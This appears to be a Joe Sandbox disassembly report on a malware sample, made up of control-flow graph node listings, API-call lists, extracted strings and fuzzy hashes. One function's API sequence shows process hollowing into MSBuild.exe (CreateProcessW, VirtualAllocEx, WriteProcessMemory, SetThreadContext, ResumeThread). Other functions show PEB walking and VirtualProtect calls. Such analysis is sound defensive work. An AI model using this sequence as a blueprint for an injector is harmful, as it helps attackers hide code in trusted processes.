15270->15271 15279 1f9898 15270->15279 15272 1f6049 __CreateFrameInfo GetModuleHandleW 15271->15272 15274 1f988c 15272->15274 15274->15279 15281 1f978e GetModuleHandleExW 15274->15281 15276 1f9746 15276->13259 15286 1f99f4 15279->15286 15282 1f97e1 15281->15282 15283 1f97cd GetProcAddress 15281->15283 15284 1f97fd 15282->15284 15285 1f97f4 FreeLibrary 15282->15285 15283->15282 15284->15279 15285->15284 15287 1f9a00 ___scrt_is_nonwritable_in_current_image 15286->15287 15301 1fa8a1 EnterCriticalSection 15287->15301 15289 1f9a0a 15302 1f98f1 15289->15302 15291 1f9a17 15306 1f9a35 15291->15306 15294 1f9829 15331 1f9810 15294->15331 15296 1f9833 15297 1f9847 15296->15297 15298 1f9837 GetCurrentProcess TerminateProcess 15296->15298 15299 1f978e __CreateFrameInfo 3 API calls 15297->15299 15298->15297 15300 1f984f ExitProcess 15299->15300 15301->15289 15303 1f98fd ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 15302->15303 15305 1f9961 __CreateFrameInfo 15303->15305 15309 1f9f9b 15303->15309 15305->15291 15330 1fa8b8 LeaveCriticalSection 15306->15330 15308 1f98d0 15308->15276 15308->15294 15310 1f9fa7 __EH_prolog3 15309->15310 15313 1fa226 15310->15313 15312 1f9fce std::_Throw_Cpp_error 15312->15305 15314 1fa232 ___scrt_is_nonwritable_in_current_image 15313->15314 15321 1fa8a1 EnterCriticalSection 15314->15321 15316 1fa240 15322 1fa0f1 15316->15322 15321->15316 15323 1fa108 15322->15323 15324 1fa110 15322->15324 15326 1fa275 15323->15326 15324->15323 15325 1fe38b ___free_lconv_mon 14 API calls 15324->15325 15325->15323 15329 1fa8b8 LeaveCriticalSection 15326->15329 15328 1fa25e 15328->15312 15329->15328 15330->15308 15334 1fff44 15331->15334 15333 1f9815 __CreateFrameInfo 15333->15296 15335 1fff53 __CreateFrameInfo 15334->15335 15336 1fff60 15335->15336 15338 1fd0ca 15335->15338 15336->15333 15339 1fd1d5 __dosmaperr 5 API calls 15338->15339 15340 1fd0e6 15339->15340 15340->15336 15342 1f76cd 15341->15342 15344 1f76df ___scrt_uninitialize_crt 15341->15344 15343 1f76db 15342->15343 15346 1fe767 15342->15346 15343->13310 15344->13310 15349 1fe892 15346->15349 15352 1fe96b 15349->15352 15353 1fe977 ___scrt_is_nonwritable_in_current_image 15352->15353 15360 1fa8a1 EnterCriticalSection 15353->15360 15355 1fe9ed 15369 1fea0b 15355->15369 15357 1fe981 ___scrt_uninitialize_crt 15357->15355 15361 1fe8df 15357->15361 15360->15357 15362 1fe8eb ___scrt_is_nonwritable_in_current_image 15361->15362 15372 1f774f EnterCriticalSection 15362->15372 15364 1fe8f5 ___scrt_uninitialize_crt 15368 1fe92e 15364->15368 15373 1fe770 15364->15373 15384 1fe95f 15368->15384 15416 1fa8b8 LeaveCriticalSection 15369->15416 15371 1fe76e 15371->15343 15372->15364 15374 1fe785 __fread_nolock 15373->15374 15375 1fe78c 15374->15375 15376 1fe797 15374->15376 15377 1fe892 ___scrt_uninitialize_crt 68 API calls 15375->15377 15378 1fe7d5 ___scrt_uninitialize_crt 64 API calls 15376->15378 15381 1fe792 __fread_nolock 15377->15381 15379 1fe7a1 15378->15379 15380 1fff08 __fread_nolock 29 API calls 15379->15380 15379->15381 15382 1fe7b8 15380->15382 15381->15368 15387 203f0f 15382->15387 15415 1f7763 LeaveCriticalSection 15384->15415 15386 1fe94d 15386->15357 15388 203f20 15387->15388 15389 203f2d 15387->15389 15390 1feb3e __dosmaperr 14 API calls 15388->15390 15391 203f76 15389->15391 15394 203f54 15389->15394 15396 203f25 15390->15396 15392 1feb3e __dosmaperr 14 API calls 15391->15392 15393 203f7b 15392->15393 15395 1fa599 __fread_nolock 29 API calls 15393->15395 15398 203f8c 15394->15398 15395->15396 15396->15381 15399 203f98 ___scrt_is_nonwritable_in_current_image 15398->15399 15411 2020ca EnterCriticalSection 15399->15411 15401 203fa7 15402 203fec 15401->15402 15404 201cdc __wsopen_s 29 API calls 15401->15404 15403 1feb3e __dosmaperr 14 API calls 15402->15403 15405 203ff3 15403->15405 15406 203fd3 FlushFileBuffers 15404->15406 15412 204022 15405->15412 15406->15405 15407 203fdf GetLastError 15406->15407 15409 1feb51 __dosmaperr 14 API calls 15407->15409 15409->15402 15411->15401 15413 2020ed __wsopen_s LeaveCriticalSection 15412->15413 15414 20400b 15413->15414 15414->15396 15415->15386 15416->15371 15866 1f9b40 15869 1f9b67 15866->15869 15870 1f9b73 ___scrt_is_nonwritable_in_current_image 15869->15870 15877 1fa8a1 EnterCriticalSection 15870->15877 15872 1f9bab 15878 1f9bc9 15872->15878 15874 1f9b7d 15874->15872 15876 200767 __strnicoll 14 API calls 15874->15876 15876->15874 15877->15874 15881 1fa8b8 LeaveCriticalSection 15878->15881 15880 1f9b65 15881->15880 16745 1fd5f0 16746 1fd60b 16745->16746 16747 1fd5fb 16745->16747 16751 1fd6f5 16747->16751 16750 1fe38b ___free_lconv_mon 14 API calls 16750->16746 16752 1fd70a 16751->16752 16753 1fd710 16751->16753 16754 1fe38b ___free_lconv_mon 14 API calls 16752->16754 16755 1fe38b ___free_lconv_mon 14 API calls 16753->16755 16754->16753 16756 1fd71c 16755->16756 16757 1fe38b ___free_lconv_mon 14 API calls 16756->16757 16758 1fd727 16757->16758 16759 1fe38b ___free_lconv_mon 14 API calls 16758->16759 16760 1fd732 16759->16760 16761 1fe38b ___free_lconv_mon 14 API calls 16760->16761 16762 1fd73d 16761->16762 16763 1fe38b ___free_lconv_mon 14 API calls 16762->16763 16764 1fd748 16763->16764 16765 1fe38b ___free_lconv_mon 14 API calls 16764->16765 16766 1fd753 16765->16766 16767 1fe38b ___free_lconv_mon 14 API calls 16766->16767 16768 1fd75e 16767->16768 16769 1fe38b ___free_lconv_mon 14 API calls 16768->16769 16770 1fd769 16769->16770 16771 1fe38b ___free_lconv_mon 14 API calls 16770->16771 16772 1fd777 16771->16772 16777 1fd86e 16772->16777 16778 1fd87a ___scrt_is_nonwritable_in_current_image 16777->16778 16793 1fa8a1 EnterCriticalSection 16778->16793 16780 1fd8ae 16794 1fd8cd 16780->16794 16782 1fd884 16782->16780 16784 1fe38b ___free_lconv_mon 14 API calls 16782->16784 16784->16780 16785 1fd8d9 16786 1fd8e5 ___scrt_is_nonwritable_in_current_image 16785->16786 16798 1fa8a1 EnterCriticalSection 16786->16798 16788 1fd8ef 16789 1fd611 __dosmaperr 14 API calls 16788->16789 16790 1fd902 16789->16790 16799 1fd922 16790->16799 16793->16782 16797 1fa8b8 LeaveCriticalSection 16794->16797 16796 1fd79d 16796->16785 16797->16796 16798->16788 16802 1fa8b8 LeaveCriticalSection 16799->16802 16801 1fd603 16801->16750 16802->16801 16323 1fdf62 16326 1fa8b8 LeaveCriticalSection 16323->16326 16325 1fdf69 16326->16325

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00213126,00213116), ref: 0021334A
                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0021335D
                                                              • Wow64GetThreadContext.KERNEL32(000000F8,00000000), ref: 0021337B
                                                              • ReadProcessMemory.KERNELBASE(000000F4,?,0021316A,00000004,00000000), ref: 0021339F
                                                              • VirtualAllocEx.KERNELBASE(000000F4,?,?,00003000,00000040), ref: 002133CA
                                                              • TerminateProcess.KERNELBASE(000000F4,00000000), ref: 002133E9
                                                              • WriteProcessMemory.KERNELBASE(000000F4,00000000,?,?,00000000,?), ref: 00213422
                                                              • WriteProcessMemory.KERNELBASE(000000F4,00400000,?,?,00000000,?,00000028), ref: 0021346D
                                                              • WriteProcessMemory.KERNELBASE(000000F4,?,?,00000004,00000000), ref: 002134AB
                                                              • Wow64SetThreadContext.KERNEL32(000000F8,02CF0000), ref: 002134E7
                                                              • ResumeThread.KERNELBASE(000000F8), ref: 002134F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                              • API String ID: 2440066154-3857624555
                                                              • Opcode ID: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                              • Instruction ID: 3e36acd9e1ac519c5c3ebc4d8d287cb8ef11ef72b721e8272b823efc40eac084
                                                              • Opcode Fuzzy Hash: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                              • Instruction Fuzzy Hash: C6B1E67660028AAFDB60CF68CC80BDA77A5FF88714F158164EA1CAB341D774FA51CB94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P]{?$P]{?$P]{?$P]{?$P]{?$P]{?$P]{?${v5${v5
                                                              • API String ID: 0-2268192598
                                                              • Opcode ID: 0bdc34296504cde0b6403c8cb8d87db94df881fe518e7788a1efca2a94e7cdb2
                                                              • Instruction ID: eb23817d62b1972568ee65cae7244798c2f72f56b08fd7ceef687348d6839e69
                                                              • Opcode Fuzzy Hash: 0bdc34296504cde0b6403c8cb8d87db94df881fe518e7788a1efca2a94e7cdb2
                                                              • Instruction Fuzzy Hash: CE632C7BBA16100FEB48C87988A93D75BC347E6314F1BE43A4999C7352DC6F884E5B90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 395 1d0350-1d075d 396 1d075f 395->396 397 1d077b-1d0780 395->397 398 1d1d70-1d1d75 396->398 399 1d0786-1d078b 397->399 400 1d11e0-1d11e5 397->400 403 1d1d77-1d1d7c 398->403 404 1d1da0-1d1da5 398->404 405 1d1d01-1d1d25 399->405 406 1d0791-1d0796 399->406 401 1d251b-1d2818 400->401 402 1d11eb-1d11f0 400->402 401->397 409 1d281e 401->409 411 1d11f6-1d1508 402->411 412 1d0770-1d0775 402->412 413 1d2bfb-1d2c18 403->413 414 1d1d82-1d1d87 403->414 407 1d1dab-1d1db0 404->407 408 1d2c53-1d2c64 404->408 410 1d1d2a-1d1d2d 405->410 415 1d079c-1d07a1 406->415 416 1d1dcf-1d1df5 VirtualProtect 406->416 407->412 417 1d1db6-1d1dc7 407->417 408->397 420 1d2c6a 408->420 428 1d2823-1d2856 call 1cf3c0 FreeConsole call 1b1000 409->428 410->410 421 1d1d2f-1d1d4d 410->421 422 1d1510-1d1515 411->422 412->397 412->398 413->397 418 1d2c1e 413->418 423 1d1d8d-1d1d92 414->423 424 1d2c23-1d2c48 call 1cf3c0 414->424 415->412 425 1d07a3-1d0b5e 415->425 416->397 419 1d1dfb 416->419 417->397 426 1d1dcd 417->426 418->398 419->398 420->398 429 1d151b-1d1520 422->429 430 1d19d0-1d19d5 422->430 423->412 431 1d1d98-1d3445 call 1f4de3 423->431 424->397 447 1d2c4e 424->447 432 1d0b60-1d0b65 425->432 426->398 461 1d285b-1d2b1b call 1b1000 428->461 436 1d1553-1d19c1 GetPEB 429->436 437 1d1522-1d1527 429->437 430->428 433 1d19db-1d19e0 430->433 439 1d0b67-1d0b6c 432->439 440 1d0ba0-1d0ba5 432->440 433->422 444 1d19e6-1d1ceb 433->444 443 1d1cee-1d1cf6 436->443 437->422 449 1d1529-1d154c GetPEB 437->449 441 1d0cc6-1d11d0 GetPEB 439->441 442 1d0b72-1d0b77 439->442 445 1d0bab-1d0bb0 440->445 446 1d1e00-1d2465 call 1cf3c0 call 1b1000 * 2 440->446 441->439 456 1d11d6 441->456 442->432 451 1d0b79-1d0b9c GetPEB 442->451 443->429 453 1d1cfc 443->453 444->443 445->432 452 1d0bb2-1d0cbb 445->452 489 1d2478-1d247e 446->489 490 1d2467 446->490 447->398 449->429 450 1d154e 449->450 450->430 451->439 458 1d0b9e 451->458 452->439 459 1d0cc1 452->459 453->430 456->440 458->440 459->440 468 1d2b20-1d2b26 461->468 470 1d2b28-1d2b2e 468->470 471 1d2b50-1d2b56 468->471 475 1d2b90-1d2b96 470->475 476 1d2b30-1d2b36 470->476 472 1d2b58-1d2b5e 471->472 473 1d2bd0-1d2bd8 471->473 477 1d2b64-1d2b6a 472->477 478 1d2be3-1d2bf0 472->478 473->470 481 1d2bde 473->481 479 1d2b9c-1d2ba2 475->479 480 1d2c6f-1d3417 475->480 483 1d2b3c-1d2b42 476->483 484 1d2bbb-1d2bc8 476->484 477->468 485 1d2b6c-1d2b83 477->485 478->470 491 1d2bf6 478->491 479->468 486 1d2ba8-1d2bb3 479->486 480->397 487 1d341d 480->487 481->471 483->468 492 1d2b44-1d2b4c 483->492 484->470 488 1d2bce 484->488 485->470 496 1d2b85 485->496 486->470 497 1d2bb9 486->497 487->398 488->471 494 1d24e0-1d24e6 489->494 495 1d2480-1d2486 489->495 498 1d24a0-1d24a6 490->498 491->471 492->470 493 1d2b4e 492->493 493->471 503 1d24ec-1d24f2 494->503 504 1d0764-1d0769 494->504 499 1d2469-1d246e 495->499 500 1d2488-1d248e 495->500 496->471 497->471 501 1d24a8-1d24ae 498->501 502 1d250b-1d2513 498->502 505 1d2470-1d2476 499->505 500->505 507 1d2490-1d2498 500->507 501->499 508 1d24b0-1d24b6 501->508 502->489 506 1d2519 502->506 503->505 509 1d24f8-1d2503 503->509 504->412 505->489 505->498 506->498 507->489 510 1d249a 507->510 508->505 511 1d24b8-1d24cf 508->511 509->489 512 1d2509 509->512 510->498 511->489 513 1d24d1 511->513 512->498 513->498
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0a0e5ea0b06c2d03e799bcd80ae29015e5b71ec8cdddc3dba3970a804fc2a20
                                                              • Instruction ID: 8eace2b622ebdc4676c3d23eef844f6790044dc7946ff353fe9961490bb78fa5
                                                              • Opcode Fuzzy Hash: e0a0e5ea0b06c2d03e799bcd80ae29015e5b71ec8cdddc3dba3970a804fc2a20
                                                              • Instruction Fuzzy Hash: 94432B7BFA19100BEB48C47ADCA63EB5BC347E9314F1FE03A4959D7355DC6E884A4A80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5ba29d3b0e435d064ec000575f718ac12bd5e64daab61842a12bc0daa47d66c
                                                              • Instruction ID: ff4548950d41f7ea765c36cc82d056be5279b8092af645e2423a14bffcbd3cc5
                                                              • Opcode Fuzzy Hash: e5ba29d3b0e435d064ec000575f718ac12bd5e64daab61842a12bc0daa47d66c
                                                              • Instruction Fuzzy Hash: 8552587BFA5A100FA748C87A8C963EB5BC35BE9314F1EE43E5999C7241DC7EC80A5640

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 218 2079a7-2079d7 call 207e41 221 2079f2-2079fe call 201d46 218->221 222 2079d9-2079e4 call 1feb51 218->222 228 207a00-207a15 call 1feb51 call 1feb3e 221->228 229 207a17-207a60 call 207dac 221->229 227 2079e6-2079ed call 1feb3e 222->227 238 207ccc-207cd0 227->238 228->227 236 207a62-207a6b 229->236 237 207acd-207ad6 GetFileType 229->237 241 207aa2-207ac8 GetLastError call 1feb64 236->241 242 207a6d-207a71 236->242 243 207ad8-207b09 GetLastError call 1feb64 CloseHandle 237->243 244 207b1f-207b22 237->244 241->227 242->241 247 207a73-207aa0 call 207dac 242->247 243->227 255 207b0f-207b1a call 1feb3e 243->255 245 207b24-207b29 244->245 246 207b2b-207b31 244->246 250 207b35-207b83 call 201eea 245->250 246->250 251 207b33 246->251 247->237 247->241 261 207ba2-207bca call 208065 250->261 262 207b85-207b91 call 207fbb 250->262 251->250 255->227 267 207bcc-207bcd 261->267 268 207bcf-207c10 261->268 262->261 269 207b93 262->269 270 207b95-207b9d call 202126 267->270 271 207c31-207c3f 268->271 272 207c12-207c16 268->272 269->270 270->238 274 207c45-207c49 271->274 275 207cca 271->275 272->271 273 207c18-207c2c 272->273 273->271 274->275 278 207c4b-207c7e CloseHandle call 207dac 274->278 275->238 281 207c80-207cac GetLastError call 1feb64 call 201e59 278->281 282 207cb2-207cc6 278->282 281->282 282->275
                                                              APIs
                                                                • Part of subcall function 00207DAC: CreateFileW.KERNELBASE(00000000,00000000,?,00207A50,?,?,00000000,?,00207A50,00000000,0000000C), ref: 00207DC9
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00207ABB
                                                              • __dosmaperr.LIBCMT ref: 00207AC2
                                                              • GetFileType.KERNELBASE(00000000), ref: 00207ACE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00207AD8
                                                              • __dosmaperr.LIBCMT ref: 00207AE1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00207B01
                                                              • CloseHandle.KERNEL32(002025EE), ref: 00207C4E
                                                              • GetLastError.KERNEL32 ref: 00207C80
                                                              • __dosmaperr.LIBCMT ref: 00207C87
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID:
                                                              • API String ID: 4237864984-0
                                                              • Opcode ID: 700253cd6516ee78958451a2b0f8de45071aefd31c12ddaa6187211ab08dfa80
                                                              • Instruction ID: 93ee4bdbff8a37cd44219a0a3bc169a8b127319e27946e9d676d41fe54a8a835
                                                              • Opcode Fuzzy Hash: 700253cd6516ee78958451a2b0f8de45071aefd31c12ddaa6187211ab08dfa80
                                                              • Instruction Fuzzy Hash: D7A14A32E282199FCF199F68EC56BAD3BA1AB16310F14415DF805AF3D2DB349C22CB51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 287 202bcd-202bdd 288 202bf7-202bf9 287->288 289 202bdf-202bf2 call 1feb51 call 1feb3e 287->289 291 202f39-202f46 call 1feb51 call 1feb3e 288->291 292 202bff-202c05 288->292 306 202f51 289->306 308 202f4c call 1fa599 291->308 292->291 293 202c0b-202c34 292->293 293->291 296 202c3a-202c43 293->296 299 202c45-202c58 call 1feb51 call 1feb3e 296->299 300 202c5d-202c5f 296->300 299->308 304 202f35-202f37 300->304 305 202c65-202c69 300->305 309 202f54-202f57 304->309 305->304 311 202c6f-202c73 305->311 306->309 308->306 311->299 314 202c75-202c8c 311->314 316 202cc1-202cc7 314->316 317 202c8e-202c91 314->317 318 202cc9-202cd0 316->318 319 202c9b-202cb2 call 1feb51 call 1feb3e call 1fa599 316->319 320 202c93-202c99 317->320 321 202cb7-202cbf 317->321 323 202cd2 318->323 324 202cd4-202cf2 call 1fed36 call 1fe38b * 2 318->324 350 202e6c 319->350 320->319 320->321 322 202d34-202d53 321->322 326 202d59-202d65 322->326 327 202e0f-202e18 call 204b34 322->327 323->324 360 202cf4-202d0a call 1feb3e call 1feb51 324->360 361 202d0f-202d32 call 20360e 324->361 326->327 332 202d6b-202d6d 326->332 339 202e89 327->339 340 202e1a-202e2c 327->340 332->327 336 202d73-202d94 332->336 336->327 341 202d96-202dac 336->341 343 202e8d-202ea3 ReadFile 339->343 340->339 345 202e2e-202e3d GetConsoleMode 340->345 341->327 346 202dae-202db0 341->346 348 202f01-202f0c GetLastError 343->348 349 202ea5-202eab 343->349 345->339 351 202e3f-202e43 345->351 346->327 352 202db2-202dd5 346->352 354 202f25-202f28 348->354 355 202f0e-202f20 call 1feb3e call 1feb51 348->355 349->348 356 202ead 349->356 358 202e6f-202e79 call 1fe38b 350->358 351->343 357 202e45-202e5d ReadConsoleW 351->357 352->327 359 202dd7-202ded 352->359 368 202e65-202e6b call 1feb64 354->368 369 202f2e-202f30 354->369 355->350 364 202eb0-202ec2 356->364 366 202e7e-202e87 357->366 367 202e5f GetLastError 357->367 358->309 359->327 371 202def-202df1 359->371 360->350 361->322 364->358 375 202ec4-202ec8 364->375 366->364 367->368 368->350 369->358 371->327 372 202df3-202e0a 371->372 372->327 381 202ee1-202eee 375->381 382 202eca-202eda call 202fd6 375->382 387 202ef0 call 202f58 381->387 388 202efa-202eff call 20327a 381->388 393 202edd-202edf 382->393 394 202ef5-202ef8 387->394 388->394 393->358 394->393
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc6f44d4a0c35a7a9419588a441cf8e4d5cf5fb262e721d1bfc5b3a1f5862e29
                                                              • Instruction ID: 15553fdd27fae41e34246ac9e96d825d5c9e1cc609f4889cd08d691f0a80e8bc
                                                              • Opcode Fuzzy Hash: dc6f44d4a0c35a7a9419588a441cf8e4d5cf5fb262e721d1bfc5b3a1f5862e29
                                                              • Instruction Fuzzy Hash: B0B12370A2430AEFDB11DF98D889BBD7BB4AF59340F14414AE909973D3CB70A966CB50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 514 1f4d76-1f4d79 515 1f4d88-1f4d8b call 1fbadf 514->515 517 1f4d90-1f4d93 515->517 518 1f4d7b-1f4d86 call 1f9a41 517->518 519 1f4d95-1f4d96 517->519 518->515 522 1f4d97-1f4d9b 518->522 523 1f55ab-1f55db call 1f4e41 call 1f664c IsProcessorFeaturePresent 522->523 524 1f4da1-1f55aa call 1f549a call 1f664c 522->524 535 1f55dd-1f55e0 523->535 536 1f55e2-1f56c1 call 1f56c2 523->536 524->523 535->536
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F55D3
                                                              • ___raise_securityfailure.LIBCMT ref: 001F56BB
                                                                • Part of subcall function 001F664C: RaiseException.KERNEL32(E06D7363,00000001,00000003,001F55C7,?,?,?,?,001F55C7,?,0021265C), ref: 001F66AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                              • String ID: E!
                                                              • API String ID: 3749517692-107689196
                                                              • Opcode ID: b59c16f23397b93a014413901588614cf594a00e0ff869a8f4673ec032ab3aa4
                                                              • Instruction ID: 2da173a89ab42ee786d4a2cd5babeda522736d9b11b80612cc9a42c152e95e72
                                                              • Opcode Fuzzy Hash: b59c16f23397b93a014413901588614cf594a00e0ff869a8f4673ec032ab3aa4
                                                              • Instruction Fuzzy Hash: 4C313EB4501348ABD704EF64FC49AD57BB9BB39718F50C12AEA0CC72B1EB709645CB84

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
